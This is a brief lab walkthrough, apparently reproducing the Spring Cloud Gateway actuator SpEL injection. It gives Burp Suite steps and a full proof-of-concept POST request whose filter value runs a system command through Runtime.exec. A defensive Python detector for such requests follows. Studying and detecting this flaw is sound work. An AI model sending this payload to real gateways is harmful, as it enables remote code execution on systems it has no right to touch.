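Environment setup
Start the container
Vulnerability reproduction
Open the service in a browser
Capture the request with Burp Suite
Convert it to a POST request
Right-click -> Change request method
Send it to the Repeater module
Modify the submitted data (PoC)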
POST /actuator/gateway/routes/fuck HTTP/1.1
Content-Type: application/json

{
  "id": "fuck",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}
Send the refresh request
Access the file to execute it
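
Defender-side check for the request shape used in the PoC above, as an added example that is not part of the original write-up: it flags POSTs to the gateway route endpoint whose JSON string values contain SpEL expressions. The function names, finding labels and both sample requests are assumptions constructed for illustration, and the sample expression is harmless.

```python
import json
import re

ROUTE_PATH = re.compile(r"^/actuator/gateway/routes/[^/?#]+/?$")  # endpoint used above
SPEL_EXPR = re.compile(r"#\{.*\}", re.S)      # SpEL template delimiters
SPEL_TYPE_REF = re.compile(r"\bT\s*\(")       # SpEL type reference, e.g. T(java.lang.Runtime)

# Constructed sample requests (not captured traffic); the expression is harmless.
SUSPICIOUS = (
    "POST /actuator/gateway/routes/demo HTTP/1.1\r\n"
    "Content-Type: application/json\r\n\r\n"
    '{"id": "demo", "filters": [{"name": "AddResponseHeader", "args": '
    '{"name": "Result", "value": "#{T(java.lang.Math).max(1, 2)}"}}], '
    '"uri": "http://example.com"}'
)
BENIGN = SUSPICIOUS.replace("#{T(java.lang.Math).max(1, 2)}", "static-value")


def iter_strings(node, path=""):
    """Yield (json_path, value) for every string in a decoded JSON document."""
    if isinstance(node, dict):
        for key, val in node.items():
            yield from iter_strings(val, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for i, val in enumerate(node):
            yield from iter_strings(val, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node


def inspect_request(raw):
    """Return (json_path, reason) findings for a route-definition request."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split(" ")
    if len(parts) < 2 or parts[0].upper() != "POST":
        return []
    if not ROUTE_PATH.match(parts[1].split("?", 1)[0]):
        return []
    try:
        route = json.loads(body)
    except json.JSONDecodeError:
        return [("body", "unparseable-route-definition")]
    findings = []
    for json_path, value in iter_strings(route):
        if SPEL_EXPR.search(value):
            typed = SPEL_TYPE_REF.search(value)
            findings.append((json_path, "spel-type-reference" if typed else "spel-expression"))
    return findings
```

Walking every string value, not only filters[].args, means an expression placed in any other field of the route definition is reported with its JSON path as well.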